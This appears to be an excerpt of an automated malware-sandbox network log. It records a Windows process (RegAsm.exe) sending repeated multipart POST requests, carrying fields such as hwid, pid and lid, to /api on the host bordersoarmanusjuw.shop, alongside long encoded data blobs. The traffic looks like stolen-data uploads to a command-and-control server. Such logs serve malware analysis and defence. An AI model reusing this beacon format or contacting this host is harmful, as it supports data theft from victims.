                                                                                                                                            2024-04-21 13:31:34 UTC738INData Raw: 64 4d 38 31 6e 4c 6d 51 55 6f 6a 32 67 41 5a 54 59 4c 46 74 6d 37 55 55 79 71 4a 63 77 64 4a 71 56 6d 46 48 2f 31 46 36 64 7a 73 66 70 43 76 2b 32 50 51 59 69 2f 66 4e 57 42 45 67 39 79 33 79 30 33 2b 59 72 55 2b 4b 6a 7a 6f 64 53 30 2f 69 56 6e 74 72 64 69 62 6b 52 4a 2f 4e 74 58 6e 4e 75 4b 67 31 43 45 6a 63 43 4e 71 2f 47 4a 6a 79 46 59 72 66 66 56 35 72 51 66 31 53 66 33 59 6d 48 4c 59 71 2b 64 66 70 46 49 72 30 79 6c 30 44 4b 72 6c 6c 6d 62 45 66 30 61 39 51 7a 70 63 32 4e 51 4d 68 73 6c 5a 76 50 57 78 65 35 41 33 35 32 66 63 59 6d 50 71 41 4e 6e 6f 2f 2b 51 76 78 6f 58 79 7a 77 52 66 4e 32 7a 67 46 4b 67 72 32 55 48 4e 38 4d 42 4b 71 4b 50 6a 55 39 52 2b 41 2f 4d 70 65 46 69 71 2f 61 35 75 31 48 39 65 71 55 73 66 54 66 6c 46 70 54 37 49 66 48 78 5a
                                                                                                                                            Data Ascii: dM81nLmQUoj2gAZTYLFtm7UUyqJcwdJqVmFH/1F6dzsfpCv+2PQYi/fNWBEg9y3y03+YrU+KjzodS0/iVntrdibkRJ/NtXnNuKg1CEjcCNq/GJjyFYrffV5rQf1Sf3YmHLYq+dfpFIr0yl0DKrllmbEf0a9Qzpc2NQMhslZvPWxe5A352fcYmPqANno/+QvxoXyzwRfN2zgFKgr2UHN8MBKqKPjU9R+A/MpeFiq/a5u1H9eqUsfTflFpT7IfHxZ
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 33 34 65 63 0d 0a 39 39 5a 5a 55 55 6a 63 66 4e 54 51 66 38 48 43 50 4b 47 58 66 31 45 6f 45 72 41 52 63 58 45 78 45 36 6f 73 2b 74 50 32 46 49 76 33 77 45 77 58 4d 72 42 69 6d 62 73 53 33 61 35 58 79 39 4a 39 57 57 42 4f 2f 6c 34 33 4d 31 78 33 7a 32 7a 7a 79 72 74 4b 7a 62 72 76 53 52 38 32 76 48 65 64 71 41 58 69 36 47 4c 4a 32 58 5a 61 66 67 71 61 4f 6d 67 7a 58 48 65 39 52 4a 2b 35 75 78 57 44 75 70 67 63 55 53 6d 6c 63 5a 36 2b 48 39 4f 34 52 63 44 54 65 56 78 76 52 66 4e 61 63 6e 45 2b 46 36 41 2b 2f 4e 76 34 41 49 76 36 79 31 51 58 59 50 6b 4c 38 64 4e 55 33 37 49 58 6b 70 55 34 65 57 56 61 2f 6c 70 68 65 69 51 70 70 79 4c 36 31 65 31 53 35 35 48 66 45 48 6c 4c 72 67 76 78 30 31 54 66 70 68 65 53 6c 54 68 53 5a 30 58 36 55 58 5a 35 4f 52 69 6c 49
                                                                                                                                            Data Ascii: 34ec99ZZUUjcfNTQf8HCPKGXf1EoErARcXExE6os+tP2FIv3wEwXMrBimbsS3a5Xy9J9WWBO/l43M1x3z2zzyrtKzbrvSR82vHedqAXi6GLJ2XZafgqaOmgzXHe9RJ+5uxWDupgcUSmlcZ6+H9O4RcDTeVxvRfNacnE+F6A+/Nv4AIv6y1QXYPkL8dNU37IXkpU4eWVa/lpheiQppyL61e1S55HfEHlLrgvx01TfpheSlThSZ0X6UXZ5ORilI
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 56 6c 37 71 59 48 46 45 51 75 6d 2b 52 74 46 62 74 71 56 6e 45 30 47 34 64 41 43 48 74 48 78 38 57 4c 58 54 50 52 37 54 56 39 31 4c 58 75 49 42 52 45 43 32 39 61 4a 53 30 46 64 69 75 56 4d 44 58 64 31 68 75 51 76 74 52 5a 58 6f 37 48 61 55 6e 2f 39 2f 31 46 34 37 2f 78 78 35 66 53 4e 77 49 32 72 38 4d 6d 50 49 56 69 76 70 52 5a 79 67 69 6d 55 34 35 46 56 38 46 7a 45 65 66 6b 76 77 65 7a 36 4b 43 48 68 55 71 74 32 36 51 73 78 76 62 72 56 6e 4b 32 6e 4a 50 59 45 72 79 58 33 46 38 4f 42 6d 6c 49 50 66 41 39 78 53 43 2f 4d 68 4d 55 57 37 66 43 50 48 34 45 38 44 71 44 34 69 58 57 46 5a 6b 53 66 35 51 63 44 38 56 46 71 63 6e 2b 4a 44 4f 45 59 48 30 78 30 68 52 53 4e 78 38 31 4e 42 2f 77 63 49 38 6f 5a 64 2f 55 53 67 53 73 42 46 7a 65 54 67 63 6f 79 4c 77 31 50
                                                                                                                                            Data Ascii: Vl7qYHFEQum+RtFbtqVnE0G4dACHtHx8WLXTPR7TV91LXuIBREC29aJS0FdiuVMDXd1huQvtRZXo7HaUn/9/1F47/xx5fSNwI2r8MmPIVivpRZygimU45FV8FzEefkvwez6KCHhUqt26QsxvbrVnK2nJPYEryX3F8OBmlIPfA9xSC/MhMUW7fCPH4E8DqD4iXWFZkSf5QcD8VFqcn+JDOEYH0x0hRSNx81NB/wcI8oZd/USgSsBFzeTgcoyLw1P
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 79 31 6f 64 4b 62 4a 6c 6d 37 30 52 32 61 35 62 77 4e 46 37 58 6d 64 46 2f 56 6b 33 4d 31 78 33 7a 32 7a 7a 79 72 74 4b 7a 62 72 6c 53 52 6f 75 73 53 50 79 30 77 75 57 77 6a 7a 54 76 78 4d 32 4b 45 33 2b 45 53 38 2f 64 42 43 74 4b 76 4c 58 39 78 4f 4a 38 73 56 57 46 53 47 78 5a 5a 6d 33 45 4e 32 72 57 4d 37 62 64 6c 64 70 53 2f 35 61 65 48 59 78 58 4f 70 45 6e 37 6d 37 46 5a 65 36 6d 42 78 52 45 62 52 31 6a 61 67 59 6d 4d 49 38 31 5a 6b 51 4e 6e 45 69 6d 54 6f 33 65 6a 68 63 2f 47 36 30 30 2b 6b 59 68 66 54 46 55 52 51 6a 75 47 53 58 76 68 6a 53 6f 31 2f 4d 32 48 46 50 61 30 62 38 56 6e 6c 78 4f 68 47 75 4c 2f 6d 53 74 58 72 6b 6b 59 42 5a 43 57 44 76 49 64 71 55 45 39 57 45 58 4d 62 51 4f 44 55 44 56 62 77 35 48 47 52 63 64 38 39 73 38 39 36 37 53 73 32
                                                                                                                                            Data Ascii: y1odKbJlm70R2a5bwNF7XmdF/Vk3M1x3z2zzyrtKzbrlSRousSPy0wuWwjzTvxM2KE3+ES8/dBCtKvLX9xOJ8sVWFSGxZZm3EN2rWM7bdldpS/5aeHYxXOpEn7m7FZe6mBxREbR1jagYmMI81ZkQNnEimTo3ejhc/G600+kYhfTFURQjuGSXvhjSo1/M2HFPa0b8VnlxOhGuL/mStXrkkYBZCWDvIdqUE9WEXMbQODUDVbw5HGRcd89s8967Ss2
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 53 79 79 61 35 2b 35 48 4e 4b 69 57 4d 58 46 65 56 4a 68 54 66 6c 63 65 48 4d 78 45 72 59 72 2f 39 6e 7a 47 34 48 38 67 42 42 35 53 39 77 6a 6e 61 42 55 67 4f 67 58 2f 4e 52 32 56 6e 6c 46 38 56 30 33 46 56 38 44 36 6b 53 66 79 35 4e 35 35 4c 72 48 55 6c 46 34 39 53 4f 57 74 68 54 58 70 6c 76 42 33 33 6c 52 5a 6b 33 33 57 48 39 31 4a 68 32 67 4a 50 58 63 39 42 4f 4c 2f 38 56 61 46 69 53 78 62 4e 72 32 66 4c 50 42 46 38 33 50 4f 41 55 71 43 74 31 57 59 6c 77 4f 58 4d 78 48 36 35 79 54 65 5a 61 53 71 7a 56 52 4a 37 73 6a 77 76 70 55 30 71 46 54 79 64 4e 39 55 6d 6c 4c 39 45 4e 77 64 43 59 53 71 53 50 38 32 76 49 54 69 2f 2f 4e 57 42 30 71 74 6d 53 55 74 68 79 59 35 44 2b 68 76 44 68 61 63 41 71 71 45 7a 64 63 4a 41 65 32 4f 76 6e 7a 39 68 33 50 6b 71 74 42
                                                                                                                                            Data Ascii: Syya5+5HNKiWMXFeVJhTflceHMxErYr/9nzG4H8gBB5S9wjnaBUgOgX/NR2VnlF8V03FV8D6kSfy5N55LrHUlF49SOWthTXplvB33lRZk33WH91Jh2gJPXc9BOL/8VaFiSxbNr2fLPBF83POAUqCt1WYlwOXMxH65yTeZaSqzVRJ7sjwvpU0qFTydN9UmlL9ENwdCYSqSP82vITi//NWB0qtmSUthyY5D+hvDhacAqqEzdcJAe2Ovnz9h3PkqtB
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 4f 52 73 42 76 4b 72 31 37 43 30 33 46 64 62 45 44 2f 56 6e 64 34 4f 52 6d 67 49 76 44 56 2b 78 36 41 2f 63 68 52 46 53 43 34 49 39 54 51 66 37 50 71 55 4e 4b 58 49 42 38 6f 61 76 6c 48 56 6e 4d 2f 44 75 52 45 6e 38 32 31 65 75 54 6a 71 44 56 36 59 4c 42 76 32 75 42 57 6d 4b 52 65 79 39 39 32 55 57 42 4f 34 46 46 38 64 44 73 64 71 79 7a 33 30 2f 45 61 6e 66 7a 41 56 52 6b 6e 76 32 65 55 71 68 58 58 36 68 6d 69 76 42 4d 64 62 31 4b 79 43 54 55 39 42 51 71 6a 4b 2f 75 51 30 68 57 55 2b 38 70 64 47 69 7a 33 43 2f 47 6e 57 72 44 42 54 71 4b 38 45 78 31 76 52 72 49 4a 4e 54 30 35 45 4b 6b 6f 35 74 37 37 45 6f 62 39 79 6b 77 65 4c 37 70 67 6d 72 30 47 32 62 68 59 77 64 4a 37 57 57 64 46 2f 6c 6c 39 50 58 70 30 7a 30 65 30 31 65 4e 53 31 37 69 41 63 68 49 78 76
                                                                                                                                            Data Ascii: ORsBvKr17C03FdbED/Vnd4ORmgIvDV+x6A/chRFSC4I9TQf7PqUNKXIB8oavlHVnM/DuREn821euTjqDV6YLBv2uBWmKRey992UWBO4FF8dDsdqyz30/EanfzAVRknv2eUqhXX6hmivBMdb1KyCTU9BQqjK/uQ0hWU+8pdGiz3C/GnWrDBTqK8Ex1vRrIJNT05EKko5t77Eob9ykweL7pgmr0G2bhYwdJ7WWdF/ll9PXp0z0e01eNS17iAchIxv
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 38 73 38 45 58 7a 63 38 34 42 53 6f 4b 30 55 5a 68 64 79 39 63 7a 45 66 72 6e 4a 4e 35 6c 70 4b 72 4e 56 45 6e 75 79 50 43 2b 6c 54 56 72 56 6e 43 30 58 5a 62 65 6b 62 39 56 33 64 38 50 68 47 6f 4a 2f 50 63 38 42 53 4b 39 38 42 59 46 79 53 7a 5a 35 53 37 56 4a 62 43 50 4b 47 58 66 30 55 6f 45 72 41 52 55 46 41 46 58 6f 63 37 34 74 6a 38 48 70 6e 78 77 56 30 48 4c 61 63 6a 38 74 4d 4c 6c 73 49 38 30 37 38 54 4e 69 68 4e 2f 68 45 76 50 33 51 58 71 69 6e 31 33 76 45 56 67 65 6a 42 56 42 30 68 73 47 53 52 71 68 2f 4b 6f 56 2f 4a 32 58 42 55 61 45 54 79 55 48 70 39 64 46 4c 4d 52 35 2b 53 2f 41 72 50 6f 6f 49 65 4e 41 4f 67 64 5a 44 36 4e 38 2b 38 58 63 33 62 62 6c 5a 70 53 65 52 63 5a 7a 31 63 64 37 74 69 6e 4c 6e 69 65 75 53 52 67 46 6b 64 59 4f 38 68 32 72
                                                                                                                                            Data Ascii: 8s8EXzc84BSoK0UZhdy9czEfrnJN5lpKrNVEnuyPC+lTVrVnC0XZbekb9V3d8PhGoJ/Pc8BSK98BYFySzZ5S7VJbCPKGXf0UoErARUFAFXoc74tj8HpnxwV0HLacj8tMLlsI8078TNihN/hEvP3QXqin13vEVgejBVB0hsGSRqh/KoV/J2XBUaETyUHp9dFLMR5+S/ArPooIeNAOgdZD6N8+8Xc3bblZpSeRcZz1cd7tinLnieuSRgFkdYO8h2r
                                                                                                                                            2024-04-21 13:31:34 UTC1369INData Raw: 46 35 4b 56 4b 42 4d 41 49 5a 6b 52 63 32 78 30 52 4f 5a 38 70 6f 6d 75 51 64 69 71 6b 6a 5a 36 50 2f 6b 4c 38 61 46 38 73 38 45 58 33 4a 63 67 48 7a 6f 45 6d 6a 6f 63 50 53 5a 63 2f 47 36 30 6c 66 55 66 6a 76 6e 4f 58 51 4d 79 73 57 43 4d 75 31 50 6d 6c 48 62 48 33 48 52 51 5a 30 48 4d 62 31 5a 77 50 78 43 70 49 2f 2f 73 78 51 65 4d 39 4d 35 5a 42 7a 48 33 4c 66 4c 54 66 35 69 6c 46 35 4b 56 51 52 30 67 43 73 30 66 48 78 5a 66 58 4c 78 73 72 4a 43 37 4a 34 7a 30 7a 6c 6b 48 4d 66 70 43 6c 37 4d 59 31 61 56 63 69 70 6b 51 4e 67 4d 4b 39 42 45 76 50 32 52 53 7a 45 65 66 6b 76 38 44 7a 36 4b 43 44 6b 4e 37 34 6a 44 4e 36 45 61 77 77 55 69 45 76 78 4e 45 41 43 47 5a 45 57 45 39 62 46 37 32 59 70 79 35 6b 46 4b 64 75 70 67 63 55 57 65 30 63 59 69 2b 46 38 36
                                                                                                                                            Data Ascii: F5KVKBMAIZkRc2x0ROZ8pomuQdiqkjZ6P/kL8aF8s8EX3JcgHzoEmjocPSZc/G60lfUfjvnOXQMysWCMu1PmlHbH3HRQZ0HMb1ZwPxCpI//sxQeM9M5ZBzH3LfLTf5ilF5KVQR0gCs0fHxZfXLxsrJC7J4z0zlkHMfpCl7MY1aVcipkQNgMK9BEvP2RSzEefkv8Dz6KCDkN74jDN6EawwUiEvxNEACGZEWE9bF72Ypy5kFKdupgcUWe0cYi+F86


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            28192.168.2.449768172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:34 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:34 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:34 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                            2024-04-21 13:31:35 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:35 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ovkug2kcqadhmi4hbftbts3p4n; expires=Thu, 15-Aug-2024 07:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1IeUblUcmQStgIOgEoQwuzcjL5LwWh2Ge2PEPBx38EVnXvfR%2FWbMdGFt%2BGzTMfC1CsQ3FlmnTrGYFpkhxKgL0%2BrQJdG11NgsHkPACsXQCLpQ9%2FU%2FN4AzbYWeMCT5a7UUCc3kPBydk6PX%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc364cdf7cc6-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            29192.168.2.449769172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:35 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8779
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:35 UTC8779OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:36 UTC816INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:35 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=172t99gnf4428lvu1okc4s3sfg; expires=Thu, 15-Aug-2024 07:18:14 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwHt5f9FAeOm0NT5tGxlFL5lWlgZ4mIVDKKuKtFsBC2d%2BJsvCT1QvJI7zpZPu%2BvNb%2FAe%2Fc8VTKcrp25EpzlKZoswdiJOl%2Bm7NrEELuCMe7y54BG0tyfEYoFHm7LU5ERXbY88A4teJ5XgLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc3b4a497bba-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            30192.168.2.449770172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:36 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20432
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:36 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:36 UTC5101OUTData Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00
                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-04-21 13:31:36 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:36 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ml8med8ogtb4r4t1mk8ut1jhbs; expires=Thu, 15-Aug-2024 07:18:15 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdqAfx%2F8HWyB44NJqhKzBVydcpqE%2BJu5E80p%2FKGw2UaaOv9%2B3ZYP2fBSWx4VghY7oZHRdOl%2Bp0c4AFpjEF5VU0EiYGt7PePGXTWy%2F2A%2BJy2hWuS6EDul8sGHNBol64SQybNUKhP8GXLEJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc404d507bc3-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            31192.168.2.449771172.67.189.664432128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:37 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
